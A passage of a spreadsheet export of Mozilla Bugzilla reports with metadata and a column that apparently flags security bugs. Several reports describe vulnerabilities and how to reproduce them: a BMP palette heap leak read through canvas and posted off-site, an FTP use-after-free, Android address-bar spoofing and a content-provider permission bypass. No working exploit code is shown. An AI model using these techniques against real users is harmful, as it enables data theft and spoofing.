      <c r="W5810" t="inlineStr">
        <is>
          <t>Full credit goes to Michael Skladnikiewicz, who reported this to security@mozilla.org in an email with subject "Mozilla Firefox 2.0.0.11, 3.0b2pre and prior Remote Information Disclosure". His initial email is quoted below.
-------------------------------------------
Hi,
(credit: Gynvael Coldwind // Vexillium with help from udevd and porneL
(I didn't know about &lt;canvas&gt; ;D))
OK, Here is how it goes.
Firefox has a problem in handling 8bit BMP files.
The BMP format has a field in the BITMAPINFOHEADER named biClrUsed, the
field says how many colors does the palette contain. If this field is 0,
then 256 color pallet is used. When this field is not 0, the palette has
the given number of colors.
Now this is how it goes in Firefox:
1. Firefox allocates 256 * sizeof(RGB) for the palette
2. It copies the biClrUsed colors from the BMP file
Well, what is missing is:
1a. memset(pallete, 0, 256 * sizeof(RGB)
The palette still contains old data from the heap.
Now, we take a BMP file sized 256x1x8 with biClrUser = 0, and fill the
bitmap with gradient, from 0 to 255:
00 01 02 03 04 05 ... and so on
When displayed, the BMP file looks chaotic, and in fact it contains the
palette copied to the screen.
Here is where HTML 5.0 comes in and &lt;canvas&gt;. You can imagine the
rest... But I'll write it anyway. You can create a HTML/javascript that
copies the image from img to a canvas and then gets it data and, for
example using a form, posts it to some remote server.
This has been tested and it works. There is a PoC exploit in the bottom.
The harvested data contains mainly trash, but there are also parts of
other websites, parts of java scripts, even parts of favorites. Well, if
there are also cookies and passwords in heap, then they are also reachable.
I've attached also the scripts and the leak.bmp bitmap.
This will be posted on bugtraq as soon as a fixed version of FireFox is
released.
Please check also Thunderbird for this issue (I didn't check).
Best regards,
Looking forward to Your reply,
Michael "Gynvael Coldwind" Skladnikiewicz
Team Vexillium
Hispasec</t>
        </is>
      </c>
      <c r="X5810" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5811">
      <c r="A5811" t="n">
        <v>1501034</v>
      </c>
      <c r="B5811" t="inlineStr">
        <is>
          <t>2018-10-22 11:40:32 -0700</t>
        </is>
      </c>
      <c r="C5811" t="inlineStr">
        <is>
          <t>FXPD: Outline Future Tasks / Features / Work</t>
        </is>
      </c>
      <c r="D5811" t="inlineStr">
        <is>
          <t>2018-10-26 12:05:58 -0700</t>
        </is>
      </c>
      <c r="E5811" t="n">
        <v>1</v>
      </c>
      <c r="F5811" t="n">
        <v>1</v>
      </c>
      <c r="G5811" t="n">
        <v>5</v>
      </c>
      <c r="H5811" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5811" t="inlineStr">
        <is>
          <t>Data Science</t>
        </is>
      </c>
      <c r="J5811" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5811" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5811" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5811" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5811" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5811" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5811" t="inlineStr"/>
      <c r="Q5811" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5811" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5811" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5811" t="n">
        <v>1</v>
      </c>
      <c r="U5811" t="n">
        <v>0</v>
      </c>
      <c r="V5811" t="n">
        <v>3</v>
      </c>
      <c r="W5811" t="inlineStr">
        <is>
          <t>Brief description of the request:
* Requested by Firefox Public Data Team, we need to collect and document all remaining work / possible future work or ideas we would like to implement going forward in order to scope and prioritize that work. 
The task is put together document with all improvements, feature adds, metric adds, etc. we want for the website. 
Link to any assets:
* Current website: https://data.firefox.com/
Is there a specific data scientist you would like or someone who has helped to triage this request:
* assigned to shong by shong</t>
        </is>
      </c>
      <c r="X5811" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5812">
      <c r="A5812" t="n">
        <v>265736</v>
      </c>
      <c r="B5812" t="inlineStr">
        <is>
          <t>2004-10-23 04:00:34 -0700</t>
        </is>
      </c>
      <c r="C5812" t="inlineStr">
        <is>
          <t>crash [@ QBCurve::SubDivide ][@ QBCurve::MidPointDivide ][@ nsCSSRendering::DrawTableBorderSegment]</t>
        </is>
      </c>
      <c r="D5812" t="inlineStr">
        <is>
          <t>2018-08-29 15:24:07 -0700</t>
        </is>
      </c>
      <c r="E5812" t="n">
        <v>1</v>
      </c>
      <c r="F5812" t="n">
        <v>1</v>
      </c>
      <c r="G5812" t="n">
        <v>3</v>
      </c>
      <c r="H5812" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5812" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5812" t="inlineStr">
        <is>
          <t>Web Painting</t>
        </is>
      </c>
      <c r="K5812" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5812" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5812" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5812" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5812" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5812" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q5812" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5812" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5812" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5812" t="n">
        <v>1</v>
      </c>
      <c r="U5812" t="n">
        <v>3</v>
      </c>
      <c r="V5812" t="n">
        <v>61</v>
      </c>
      <c r="W5812" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.3) Gecko/20041022 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.3) Gecko/20041022 Firefox/1.0
After visiting the URl Firefox terminates without any warning.
Reproducible: Always
Steps to Reproduce:
1. go to the URL: http://www.home.karneval.cz/10000565/test.html
Actual Results:  
Firefox terminates
Expected Results:  
Firefox should not terminate
I found this page using the mangle.cgi script. I'll attach a testcase soon.</t>
        </is>
      </c>
      <c r="X5812" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5813">
      <c r="A5813" t="n">
        <v>808402</v>
      </c>
      <c r="B5813" t="inlineStr">
        <is>
          <t>2012-11-04 07:31:06 -0800</t>
        </is>
      </c>
      <c r="C5813" t="inlineStr">
        <is>
          <t>FTP use-after-free crash [@nsInputStreamPump::Cancel]</t>
        </is>
      </c>
      <c r="D5813" t="inlineStr">
        <is>
          <t>2024-02-08 20:07:50 -0800</t>
        </is>
      </c>
      <c r="E5813" t="n">
        <v>1</v>
      </c>
      <c r="F5813" t="n">
        <v>1</v>
      </c>
      <c r="G5813" t="n">
        <v>6</v>
      </c>
      <c r="H5813" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5813" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5813" t="inlineStr">
        <is>
          <t>Networking: FTP</t>
        </is>
      </c>
      <c r="K5813" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5813" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5813" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5813" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5813" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5813" t="inlineStr">
        <is>
          <t>crash [leave open][adv-main21+][adv-esr1706+]</t>
        </is>
      </c>
      <c r="Q5813" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5813" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5813" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5813" t="n">
        <v>1</v>
      </c>
      <c r="U5813" t="n">
        <v>0</v>
      </c>
      <c r="V5813" t="n">
        <v>47</v>
      </c>
      <c r="W5813" t="inlineStr">
        <is>
          <t>Created attachment 678119
callstack
This is a reproducible use-after-free crash which occurred while testing FTP server responses. Haven't managed it to get an external testcase for this bug but it crashes reliably in the fuzzer after some time. (The flow of the requests/responses is included in the file of the callstack.)
The fake server accepts FTP connections from Firefox, some of the responses have no CRLF token in the response (FTP banner) when Firefox tries to handle upcoming connections it shows an alert() message of the previous response where we didn't provide a CRLF token, clicking that alert() box results in this crash. I am guessing that this seems to be a problem in handling async connections and their state.
In the callstack of the free'ed thread we see:
    #26 0x1051b0541 in nsFtpState::StopProcessing nsFtpConnectionThread.cpp:1866
    #27 0x1051b90e4 in nsFtpState::CloseWithStatus nsFtpConnectionThread.cpp:2153
therefore I have put this into the FTP category.
The following assertions are shown before the crash occurs:
###!!! ASSERTION: ftp read state mixup: 'Error', file /Users/cdiehl/Code/Mozilla/mc-asan-opt/netwerk/protocol/ftp/nsFtpConnectionThread.cpp, line 195
###!!! ASSERTION: Read buffer doesn't include response code: 'line.Length() &gt; 4 &amp;&amp; startNum', file /Users/cdiehl/Code/Mozilla/mc-asan-opt/netwerk/protocol/ftp/nsFtpConnectionThread.cpp, line 184
alloc: netwerk/base/src/nsInputStreamPump.cpp:64
nsRefPtr&lt;nsInputStreamPump&gt; pump = new nsInputStreamPump();
free: netwerk/base/src/nsInputStreamPump.cpp:141
// although this class can only be accessed from one thread at a time, we do
// allow its ownership to move from thread to thread, assuming the consumer
// understands the limitations of this.
NS_IMPL_THREADSAFE_ISUPPORTS3(nsInputStreamPump,
                              nsIRequest,
                              nsIInputStreamCallback,
                              nsIInputStreamPump)
re-use: netwerk/base/src/nsInputStreamPump.cpp:188
185:   // close input stream
186:    if (mAsyncStream) {
187:        mAsyncStream-&gt;CloseWithStatus(status);
188:        if (mSuspendCount == 0) 
189:            EnsureWaiting();
Tested on m-c changeset: 112115:56d3db021482</t>
        </is>
      </c>
      <c r="X5813" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5814">
      <c r="A5814" t="n">
        <v>1293463</v>
      </c>
      <c r="B5814" t="inlineStr">
        <is>
          <t>2016-08-08 16:02:54 -0700</t>
        </is>
      </c>
      <c r="C5814" t="inlineStr">
        <is>
          <t>Firefox for Android: Location Bar Spoofing Risk - The Location Bar remains hidden when the user manually scrolls down a webpage and another website is loaded during this scroll event</t>
        </is>
      </c>
      <c r="D5814" t="inlineStr">
        <is>
          <t>2024-05-30 09:20:12 -0700</t>
        </is>
      </c>
      <c r="E5814" t="n">
        <v>1</v>
      </c>
      <c r="F5814" t="n">
        <v>1</v>
      </c>
      <c r="G5814" t="n">
        <v>6</v>
      </c>
      <c r="H5814" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5814" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J5814" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5814" t="inlineStr">
        <is>
          <t>48 Branch</t>
        </is>
      </c>
      <c r="L5814" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5814" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5814" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5814" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5814" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main51+]</t>
        </is>
      </c>
      <c r="Q5814" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5814" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5814" t="inlineStr">
        <is>
          <t>Firefox 51</t>
        </is>
      </c>
      <c r="T5814" t="n">
        <v>0</v>
      </c>
      <c r="U5814" t="n">
        <v>0</v>
      </c>
      <c r="V5814" t="n">
        <v>17</v>
      </c>
      <c r="W5814" t="inlineStr">
        <is>
          <t>Created attachment 8779095
TestCase1.zip
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0
Build ID: 20160726073904
Steps to reproduce:
[A demonstration video will be uploaded to show you the malicious result of this security bug]
-----
Step1 : Go to http://www.alternativ-testing.fr/Research/Mozilla/android/~F5g9M-Addressbar-Spoofing-j3U7k~/index-start.html 
-----
Step2 : Go down into this webpage (the location bar disappears) , during this event a malicious webpage which is slow to load will start its loading without that the Location Bar shows its web address (and the Location Bar remains hidden). 
(During the slow loading of the malicious website, a link specially crafted can be clicked). 
&lt;!&gt;Step2 INFO : The loading time of the malicious webpage is 9 seconds when you go on the testcase link ( http://www.alternativ-testing.fr/Research/Mozilla/android/~F5g9M-Addressbar-Spoofing-j3U7k~/index-start.html ) but can be changed by a bigger loading time. (The PHP code of the "redirect-and-sleep().php" can be changed by a bigger or smaller loading time).&lt;!&gt;
-----
Step3 : After going down into the webpage "index-start.html", the user can click on the link "https://www.google.fr" (before the loading of the malicious webpage which is 9 seconds ) or wait the loading of the malicious website after the scrolling down.
-----
Actual results:
A faked Location Bar is shown instead the true location bar which remains hidden.
When you go on a webpage specially crafted which uses a slow loading to a malicious webpage/website during you scroll down into this first webpage, the Location Bar disappears (even if another website/webpage is loaded), if an user clicks on a link which hasn't effect (crafted specially to mislead the user which thinks that the link goes on the website indicated or of its choice) the Location Bar is always invisible when the malicious Webpage is loaded and this malicious webpage contains a faked Location Bar leading to a Location Bar URL / SSL Spoofing Risk.
Expected results:
The Location Bar should reappear and be always visible when another webpage is loaded but it is not the case for this security bug.
When a webpage is slowly loaded by another webpage, and even if you go down on this webpage (manually scroll down) and that the Location Bar disappears , The Location Bar should be normally visible when another webpage is loaded.
The Location Bar should be always visible when another website or another webpage is loaded.</t>
        </is>
      </c>
      <c r="X5814" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5815">
      <c r="A5815" t="n">
        <v>1369095</v>
      </c>
      <c r="B5815" t="inlineStr">
        <is>
          <t>2017-05-31 09:06:39 -0700</t>
        </is>
      </c>
      <c r="C5815" t="inlineStr">
        <is>
          <t>Photon panelmultiview subviews should be scrollable</t>
        </is>
      </c>
      <c r="D5815" t="inlineStr">
        <is>
          <t>2017-08-04 09:43:50 -0700</t>
        </is>
      </c>
      <c r="E5815" t="n">
        <v>1</v>
      </c>
      <c r="F5815" t="n">
        <v>1</v>
      </c>
      <c r="G5815" t="n">
        <v>2</v>
      </c>
      <c r="H5815" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5815" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5815" t="inlineStr">
        <is>
          <t>Toolbars and Customization</t>
        </is>
      </c>
      <c r="K5815" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5815" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5815" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5815" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5815" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5815" t="inlineStr">
        <is>
          <t>[photon-structure]</t>
        </is>
      </c>
      <c r="Q5815" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5815" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5815" t="inlineStr">
        <is>
          <t>Firefox 56</t>
        </is>
      </c>
      <c r="T5815" t="n">
        <v>1</v>
      </c>
      <c r="U5815" t="n">
        <v>0</v>
      </c>
      <c r="V5815" t="n">
        <v>41</v>
      </c>
      <c r="W5815" t="inlineStr">
        <is>
          <t>This makes the subviews unscrollable, and is incorrect:
https://dxr.mozilla.org/mozilla-central/rev/7b8937970f9ca85db88cb2496f2112175fd847c8/browser/themes/shared/customizableui/panelUI.inc.css#356-360
The Developer subview suffers from this issue. It can be observed by moving the panel's anchor to the center of the screen, and I guess it is present on lower resolutions as well.</t>
        </is>
      </c>
      <c r="X5815" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5816">
      <c r="A5816" t="n">
        <v>531985</v>
      </c>
      <c r="B5816" t="inlineStr">
        <is>
          <t>2009-11-30 15:44:01 -0800</t>
        </is>
      </c>
      <c r="C5816" t="inlineStr">
        <is>
          <t>Bespin server pavement should create schema during development</t>
        </is>
      </c>
      <c r="D5816" t="inlineStr">
        <is>
          <t>2010-02-20 12:50:46 -0800</t>
        </is>
      </c>
      <c r="E5816" t="n">
        <v>1</v>
      </c>
      <c r="F5816" t="n">
        <v>1</v>
      </c>
      <c r="G5816" t="n">
        <v>6</v>
      </c>
      <c r="H5816" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5816" t="inlineStr">
        <is>
          <t>Skywriter Graveyard</t>
        </is>
      </c>
      <c r="J5816" t="inlineStr">
        <is>
          <t>Server</t>
        </is>
      </c>
      <c r="K5816" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5816" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5816" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5816" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5816" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5816" t="inlineStr"/>
      <c r="Q5816" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5816" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5816" t="inlineStr">
        <is>
          <t>0.5.1</t>
        </is>
      </c>
      <c r="T5816" t="n">
        <v>1</v>
      </c>
      <c r="U5816" t="n">
        <v>0</v>
      </c>
      <c r="V5816" t="n">
        <v>3</v>
      </c>
      <c r="W5816" t="inlineStr">
        <is>
          <t>Currently, the Bespin server pavement.py doesn't seem to create the appropriate schema in the development SQLite database. This causes logins to fail when the developer guide instructions on the wiki are followed.
The version of bespinserver on my bitbucket repo contains a modified "develop" task that populates the SQLite database. This makes the instructions on the wiki work again.
[needs-pull] Commit 8a67333b175b at http://bitbucket.org/pcwalton/bespinserver/</t>
        </is>
      </c>
      <c r="X5816" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5817">
      <c r="A5817" t="n">
        <v>1229681</v>
      </c>
      <c r="B5817" t="inlineStr">
        <is>
          <t>2015-12-02 00:17:33 -0800</t>
        </is>
      </c>
      <c r="C5817" t="inlineStr">
        <is>
          <t>Content providers protected with signature-level permissions can be accessed by an application installed beforehand that defines the same permissions</t>
        </is>
      </c>
      <c r="D5817" t="inlineStr">
        <is>
          <t>2024-05-30 09:07:34 -0700</t>
        </is>
      </c>
      <c r="E5817" t="n">
        <v>1</v>
      </c>
      <c r="F5817" t="n">
        <v>1</v>
      </c>
      <c r="G5817" t="n">
        <v>6</v>
      </c>
      <c r="H5817" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5817" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J5817" t="inlineStr">
        <is>
          <t>Data Providers</t>
        </is>
      </c>
      <c r="K5817" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5817" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5817" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N5817" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5817" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5817" t="inlineStr">
        <is>
          <t>[android 21+ unaffected?][post-critsmash-triage][adv-main46+]</t>
        </is>
      </c>
      <c r="Q5817" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5817" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5817" t="inlineStr">
        <is>
          <t>Firefox 46</t>
        </is>
      </c>
      <c r="T5817" t="n">
        <v>1</v>
      </c>
      <c r="U5817" t="n">
        <v>0</v>
      </c>
      <c r="V5817" t="n">
        <v>18</v>
      </c>
      <c r="W5817" t="inlineStr">
        <is>
          <t>Created attachment 8694611
poc.apk
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Steps to reproduce:
1. Launch an emulator (or device) whose API level is 16( or lower)
2. Install attached poc app (poc.apk) with adb
3. Install firefox for android app with adb
4. Launch and use firefox for android app usually (add bookmarks, save passwords, e.t.c.)
5. Launch poc app and press some buttons on UI
   -&gt; poc app tries to access content providers below.
      - org.mozilla.gecko.db.BrowserProvider
      - org.mozilla.gecko.db.PasswordsProvider
      - org.mozilla.gecko.db.FormHistoryProvider
Mechanism:
- In API level 20 or lower, a custom permission defined first is enabled (and duplicated name permissions are ignored).
  -&gt; The poc app defines permissions, whose name are same as firefox defines, as normal level
     - org.mozilla.firefox.permissions.PASSWORD_PROVIDER
     - org.mozilla.firefox.permissions.BROWSER_PROVIDER
     - org.mozilla.firefox.permissions.FORMHISTORY_PROVIDER
- In API level 16 or lower, default value of exported attribute of content provider is true.
  -&gt; Any app can access some content providers in firefox app on API level 16 or lower.
Actual results:
The poc app can read data handled by the content providers.
Note that the poc app only read data, but it can insert, update and delete data if implement functions.
Expected results:
The content providers deny access from app whose signature is different from Mozilla's one.</t>
        </is>
      </c>
      <c r="X5817" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5818">
      <c r="A5818" t="n">
        <v>430658</v>
      </c>
      <c r="B5818" t="inlineStr">
        <is>
          <t>2008-04-24 06:39:49 -0700</t>
        </is>
      </c>
      <c r="C5818" t="inlineStr">
        <is>
          <t>Remaining attack vectors in FeedWriter.js</t>
        </is>
      </c>
      <c r="D5818" t="inlineStr">
        <is>
          <t>2018-12-20 14:42:01 -0800</t>
        </is>
      </c>
      <c r="E5818" t="n">
        <v>1</v>
      </c>
      <c r="F5818" t="n">
        <v>1</v>
      </c>
      <c r="G5818" t="n">
        <v>6</v>
      </c>
      <c r="H5818" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5818" t="inlineStr">
        <is>
          <t>Firefox Graveyard</t>
        </is>
      </c>
      <c r="J5818" t="inlineStr">
        <is>
          <t>RSS Discovery and Preview</t>
        </is>
      </c>
      <c r="K5818" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5818" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5818" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5818" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5818" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5818" t="inlineStr">
        <is>
          <t>[sg:critical][fixed in 360529]</t>
        </is>
      </c>
      <c r="Q5818" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5818" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5818" t="inlineStr">
        <is>
          <t>Firefox 3</t>
        </is>
      </c>
      <c r="T5818" t="n">
        <v>1</v>
      </c>
      <c r="U5818" t="n">
        <v>0</v>
      </c>
      <c r="V5818" t="n">
        <v>26</v>
      </c>
      <c r="W5818" t="inlineStr">
        <is>
          <t>This is a follow up to bug 360529.
395   _setTitleText: function FW__setTitleText(container) {
396     if (container.title) {
397       this._setContentText(TITLE_ID, container.title.plainText());
398       this._document.title = container.title.plainText();
399     }
Line 398 is exploitable since it fires DOMTitleChanged event.
411   _setTitleImage: function FW__setTitleImage(container) {
...
437       var feedTitleText = this._document.getElementById("feedTitleText");
438       var titleImageWidth = parseInt(parts.getPropertyAsAString("width")) + 15;
439       feedTitleText.style.marginRight = titleImageWidth + "px";
Line 439 is exploitable since it sets style attribute and thus fires mutation
events.
940   _initSubscriptionUI: function FW__initSubscriptionUI() {
...
960       default:
961         codeStr = "header.className = 'feedBackground'; ";
962         header.className = "feedBackground";
Line 962 is unnecessary (and exploitable).</t>
        </is>
      </c>
      <c r="X5818" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5819">
      <c r="A5819" t="n">
        <v>125720</v>
      </c>
      <c r="B5819" t="inlineStr">
        <is>
          <t>2002-02-15 08:40:48 -0800</t>
        </is>
      </c>
      <c r="C5819" t="inlineStr">
        <is>
          <t>Embedded images with no resource fork, sent in the appledouble format are sent incorrectly</t>
        </is>
      </c>
      <c r="D5819" t="inlineStr">
        <is>
          <t>2008-07-31 01:22:10 -0700</t>
        </is>
      </c>
      <c r="E5819" t="n">
        <v>1</v>
      </c>
      <c r="F5819" t="n">
        <v>1</v>
      </c>
      <c r="G5819" t="n">
        <v>3</v>
      </c>
      <c r="H5819" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5819" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J5819" t="inlineStr">
        <is>
          <t>Composition</t>
        </is>
      </c>
      <c r="K5819" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5819" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M5819" t="inlineStr">
        <is>
          <t>Mac System 9.x</t>
        </is>
      </c>
      <c r="N5819" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5819" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5819" t="inlineStr">
        <is>
          <t>have fix,AOLTW+,AOLTWOK</t>
        </is>
      </c>
      <c r="Q5819" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5819" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5819" t="inlineStr">
        <is>
          <t>mozilla0.9.9</t>
        </is>
      </c>
      <c r="T5819" t="n">
        <v>1</v>
      </c>
      <c r="U5819" t="n">
        <v>0</v>
      </c>
      <c r="V5819" t="n">
        <v>9</v>
      </c>
      <c r="W5819" t="inlineStr">
        <is>
          <t>Using build 20020212 on Mac OS9.1 and with the Internet Options for Outgoing
File Mapping set to Macintosh (appledouble format), if the user sends a message
with an embedded .jpg image the recipients won't see the embedded image.  
1. Set your Mac's Internet options for a File Transfer of a jpg file to
Macintosh and make sure you select the Map Outgoing option too.
2. Create a Mail message and embed a .jpg file and save the copy to a Local
Drafts folder or Send it to yourself.
Result: The mail message appears with a outline of where the image should
display with a broken icon in the upper left hand corner.  The Page source shows
a content-type of mulitpart/appledouble  and another one of application/applefile.
Expected: The mail message to show the image inline
Current Workaround: Change the Internet Option to Binary or uncheck the Map
Outgoing.</t>
        </is>
      </c>
      <c r="X5819" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5820">
      <c r="A5820" t="n">
        <v>1448344</v>
      </c>
      <c r="B5820" t="inlineStr">
        <is>
          <t>2018-03-23 08:28:59 -0700</t>
        </is>
      </c>
      <c r="C5820" t="inlineStr">
        <is>
          <t>Implement equivalent retention query using the clients_daily dataset</t>
        </is>
      </c>
      <c r="D5820" t="inlineStr">
        <is>
          <t>2022-07-26 12:18:12 -0700</t>
        </is>
      </c>
      <c r="E5820" t="n">
        <v>1</v>
      </c>
      <c r="F5820" t="n">
        <v>1</v>
      </c>
      <c r="G5820" t="n">
        <v>2</v>
      </c>
      <c r="H5820" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5820" t="inlineStr">
        <is>
          <t>Data Platform and Tools</t>
        </is>
      </c>
      <c r="J5820" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5820" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5820" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5820" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5820" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5820" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5820" t="inlineStr"/>
      <c r="Q5820" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5820" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5820" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5820" t="n">
        <v>1</v>
      </c>
      <c r="U5820" t="n">
        <v>0</v>
      </c>
      <c r="V5820" t="n">
        <v>3</v>
      </c>
      <c r="W5820" t="inlineStr">
        <is>
          <t>Write a query against clients_daily that produces the same output as the following query against the churn dataset:
https://sql.telemetry.mozilla.org/queries/50208/source#134864</t>
        </is>
      </c>
      <c r="X5820" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5821">
      <c r="A5821" t="n">
        <v>111108</v>
      </c>
      <c r="B5821" t="inlineStr">
        <is>
          <t>2001-11-20 21:31:14 -0800</t>
        </is>
      </c>
